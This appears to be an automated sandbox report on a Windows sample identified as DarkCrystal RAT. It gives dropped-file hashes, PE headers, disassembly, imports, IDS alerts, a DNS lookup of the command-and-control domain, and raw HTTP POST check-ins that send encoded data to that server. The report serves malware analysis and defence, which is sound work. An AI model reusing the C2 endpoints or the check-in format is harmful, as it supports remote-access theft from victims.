                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1224
                                                  Entropy (8bit):4.435108676655666
                                                  Encrypted:false
                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                  Malicious:false
                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.9356479918748555
                                                  Encrypted:false
                                                  SSDEEP:48:6WJ7PtcjM7Jt8Bs3FJsdcV4MKe27KvqBHeOulajfqXSfbNtm:tPlPc+Vx9MKvk4cjRzNt
                                                  MD5:F8039D70F65A42398553592AFA2F0266
                                                  SHA1:BB05F093A2D84BFE254CD644FE816DF079B9D4D8
                                                  SHA-256:5AE5FD9D06A65508309039653EA0086019691F02B32CB59DC2888BC9A7CA3043
                                                  SHA-512:3431504A664526D2A82FAB28B0A0FF3B103AA811C504D5E848CBA6F08BABF1BE09B981703CFB0BE607C98F96B7508173B3C3821DC4B0F705FAD343C414868D8A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ivg.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                  Process:C:\Windows\System32\w32tm.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):151
                                                  Entropy (8bit):4.827179091092449
                                                  Encrypted:false
                                                  SSDEEP:3:VLV993J+miJWEoJ8FXyVTtQv4uWRK4WR0XaNvpYVuWcnNvj:Vx993DEUFt5ud47n4bx
                                                  MD5:F467A4655120C2346AD5C2DB3C05C995
                                                  SHA1:1D26354DAD166E60F71E05B0B966A75982ADD2F7
                                                  SHA-256:B9793FE4B0AA5EC69A4AA989C3D7F98E5D29A9B2425B65AB13741F23725671B4
                                                  SHA-512:60B771AA6EE2673968A29445BDF03B948E31F94680D4537F0D6A70B39226AF9408FED2820E4B242D328E0CBA4842BF114F451F57F52018492EB5FD79EBB95CE8
                                                  Malicious:false
                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/01/2025 03:09:34..03:09:34, error: 0x80072746.03:09:39, error: 0x80072746.
                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):7.991955156889876
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:t8F7Ic986c.exe
                                                  File size:7'204'705 bytes
                                                  MD5:a4923d4db3234b3905ad3097cc03af46
                                                  SHA1:3e12ad372643b3c9d91053b91f61f8cd7e42118c
                                                  SHA256:4685860269353c0eaaec2e5da79cb35a475123a37fa6d77c4faf345840da2a10
                                                  SHA512:066ddbbe0b4bc88307126186dcbb7fdee75ea47755e5874fa4ee334bc406388629a2457ef507fbbdd7ffc5239f45319b14abac9caf74e318b7fb4521d5c4b980
                                                  SSDEEP:98304:chbl5D70z1Mb4rsJgNd1ezhQcSZcOb+sX1Zvbed4Z0FGRABTgtse6vzovk18:chbl5D70RMVhhQcERCsXDjyZkJMu
                                                  TLSH:0476335DA2A44CB9ECFB023EC495881ADBB178611781DB8B0770515B1FD76B26C3EF82
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........
                                                  Icon Hash:07554d70e14d5317
                                                  Entrypoint:0x14000c540
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x665AC400 [Sat Jun 1 06:47:28 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:2
                                                  File Version Major:5
                                                  File Version Minor:2
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:2
                                                  Import Hash:f4f2e2b03fe5666a721620fcea3aea9b
                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F9678E6F3ECh
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F9678E6F00Fh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F9678E6F964h
                                                  test eax, eax
                                                  je 00007F9678E6F1B3h
                                                  dec eax
                                                  mov eax, dword ptr [00000030h]
                                                  dec eax
                                                  mov ecx, dword ptr [eax+08h]
                                                  jmp 00007F9678E6F197h
                                                  dec eax
                                                  cmp ecx, eax
                                                  je 00007F9678E6F1A6h
                                                  xor eax, eax
                                                  dec eax
                                                  cmpxchg dword ptr [00034FACh], ecx
                                                  jne 00007F9678E6F180h
                                                  xor al, al
                                                  dec eax
                                                  add esp, 28h
                                                  ret
                                                  mov al, 01h
                                                  jmp 00007F9678E6F189h
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  sub esp, 28h
                                                  test ecx, ecx
                                                  jne 00007F9678E6F199h
                                                  mov byte ptr [00034F95h], 00000001h
                                                  call 00007F9678E6F771h
                                                  call 00007F9678E6FD78h
                                                  test al, al
                                                  jne 00007F9678E6F196h
                                                  xor al, al
                                                  jmp 00007F9678E6F1A6h
                                                  call 00007F9678E7DD0Fh
                                                  test al, al
                                                  jne 00007F9678E6F19Bh
                                                  xor ecx, ecx
                                                  call 00007F9678E6FD88h
                                                  jmp 00007F9678E6F17Ch
                                                  mov al, 01h
                                                  dec eax
                                                  add esp, 28h
                                                  ret
                                                  int3
                                                  int3
                                                  inc eax
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  cmp byte ptr [00034F5Ch], 00000000h
                                                  mov ebx, ecx
                                                  jne 00007F9678E6F1F9h
                                                  cmp ecx, 01h
                                                  jnbe 00007F9678E6F1FCh
                                                  call 00007F9678E6F8DAh
                                                  test eax, eax
                                                  je 00007F9678E6F1BAh
                                                  test ebx, ebx
                                                  jne 00007F9678E6F1B6h
                                                  dec eax
                                                  lea ecx, dword ptr [00034F46h]
                                                  call 00007F9678E7DB02h
                                                   Name | Virtual Address | Virtual Size | Is in Section
                                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e0bc | 0x78 | .rdata
                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x36b4 | .rsrc
                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x43000 | 0x231c | .pdata
                                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4b000 | 0x758 | .reloc
                                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b460 | 0x1c | .rdata
                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3b320 | 0x140 | .rdata
                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x2c000 | 0x438 | .rdata
                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                   .text | 0x1000 | 0x2afb0 | 0x2b000 | 40bf1edebd1304ce1b08c50cb556d4db | False | 0.5458416606104651 | data | 6.5002315273868 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                   .rdata | 0x2c000 | 0x12f36 | 0x13000 | d9c5dd6baa4ff7123551997c8a84cae6 | False | 0.5160490337171053 | data | 5.827851897350369 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .data | 0x3f000 | 0x33b8 | 0xe00 | ae0f42b168987b17129506ccc4960b21 | False | 0.13392857142857142 | firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes | 1.8264700601019173 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                   .pdata | 0x43000 | 0x231c | 0x2400 | ffc5390666982cab67e3c9bf8e263bc3 | False | 0.4784071180555556 | data | 5.382434020909434 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   _RDATA | 0x46000 | 0x1f4 | 0x200 | 771f0b097891d31289bb68f0eb426e66 | False | 0.529296875 | data | 3.713242247775091 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .rsrc | 0x47000 | 0x36b4 | 0x3800 | ccc25b13f665fc385c7eeb61c91cda58 | False | 0.92724609375 | data | 7.85808934891437 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .reloc | 0x4b000 | 0x758 | 0x800 | 7ecf18b15822e1aa4c79b9a361f07c79 | False | 0.546875 | data | 5.250941834312499 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                   RT_ICON | 0x470e8 | 0x30a5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9967879225889343
                                                   RT_GROUP_ICON | 0x4a190 | 0x14 | data | | | 1.05
                                                   RT_MANIFEST | 0x4a1a4 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetModuleFileNameW, CreateSymbolicLinkW, GetCPInfo, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, GetProcAddress, GetSystemTimeAsFileTime, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-02T07:42:12.937028+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49730 | 185.158.202.52 | 80 | TCP
2025-01-02T07:42:40.718432+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49737 | 185.158.202.52 | 80 | TCP
2025-01-02T07:42:47.937085+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49738 | 185.158.202.52 | 80 | TCP
2025-01-02T07:42:57.077732+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49740 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:05.374608+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49788 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:08.640348+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49809 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:10.452741+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49820 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:13.468391+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49841 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:15.952759+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49859 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:37.905923+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49995 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:46.015323+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50013 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:49.327933+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50014 | 185.158.202.52 | 80 | TCP
2025-01-02T07:43:52.952838+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 50015 | 185.158.202.52 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 07:42:12.204611063 CET | 55396 | 53 | 192.168.2.4 | 1.1.1.1
Jan 2, 2025 07:42:12.213943005 CET | 53 | 55396 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 07:42:12.204611063 CET | 192.168.2.4 | 1.1.1.1 | 0x70a4 | Standard query (0) | 797441cm.n9shteam2.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 07:42:12.213943005 CET | 1.1.1.1 | 192.168.2.4 | 0x70a4 | No error (0) | 797441cm.n9shteam2.top | | 185.158.202.52 | A (IP address) | IN (0x0001) | false
                                                  • 797441cm.n9shteam2.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.158.202.52 | 80 | 6924 | C:\Recovery\Memory Compression.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 07:42:12.228691101 CET | 273 | OUT | POST /Videouploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 797441cm.n9shteam2.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 2, 2025 07:42:12.578655005 CET | 344 | OUT | Data Raw: 00 06 01 01 06 00 04 02 05 06 02 01 02 03 01 0b 00 0b 05 00 02 0c 03 08 07 06 0d 06 04 02 03 02 0d 02 05 0a 02 56 06 55 0b 01 06 53 05 03 05 06 05 00 0d 0c 0f 00 07 0b 06 02 05 02 07 02 04 09 00 56 0f 01 07 53 04 07 0c 04 0b 0f 0f 03 0d 06 07 53
Data Ascii: VUSVSS\L}Q|NW]vqaMwf`~lawR`|Mc[oR]xcz}m^vdk^u~V@z}Prq
Jan 2, 2025 07:42:12.863842010 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 2, 2025 07:42:12.998162985 CET | 376 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 02 Jan 2025 06:42:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 213
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.4 | 49737 | 185.158.202.52 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 07:42:40.034801960 CET | 326 | OUT | POST /Videouploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 797441cm.n9shteam2.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 2, 2025 07:42:40.390450954 CET | 344 | OUT | Data Raw: 05 06 01 02 06 0d 01 05 05 06 02 01 02 01 01 07 00 05 05 0b 02 00 03 01 07 0f 0e 04 03 05 01 04 0c 06 04 0f 00 50 07 04 0c 54 06 07 04 03 02 0f 05 00 0b 09 0f 02 07 0b 07 01 06 53 01 0b 07 00 01 01 0f 5c 06 0e 06 54 0c 02 0c 04 0a 06 0f 09 06 01
Data Ascii: PTS\TVRV\L}P^~wnYv\kR|j_tlw_h`pxl|_zsaY|}`CtYZOu~V@{}nL~r[
Jan 2, 2025 07:42:40.671520948 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 2, 2025 07:42:40.802408934 CET | 376 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 02 Jan 2025 06:42:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 213
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 185.158.202.52 | Destination Port: 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jan 2, 2025 07:42:47.244177103 CET | 308 | OUT | POST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 336
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:47.593909025 CET | 336 | OUT | Data Raw: 00 02 01 00 03 08 01 03 05 06 02 01 02 05 01 01 00 02 05 09 02 05 03 0c 02 0e 0d 53 04 07 00 07 0e 07 06 0b 02 06 04 02 0e 05 05 00 00 07 05 00 04 07 0d 09 0d 50 01 02 01 04 06 50 06 06 07 5a 02 56 0a 0a 06 0e 07 51 0e 04 0e 07 0d 53 0c 07 05 06
                                                  Data Ascii: SPPZVQS[P\L}Th`[\c\[b[QPhUywwXkp|K{|Z_{`[Y~httlLi_~V@AxmrN~uy
                                                  Jan 2, 2025 07:42:47.888977051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:48.019974947 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
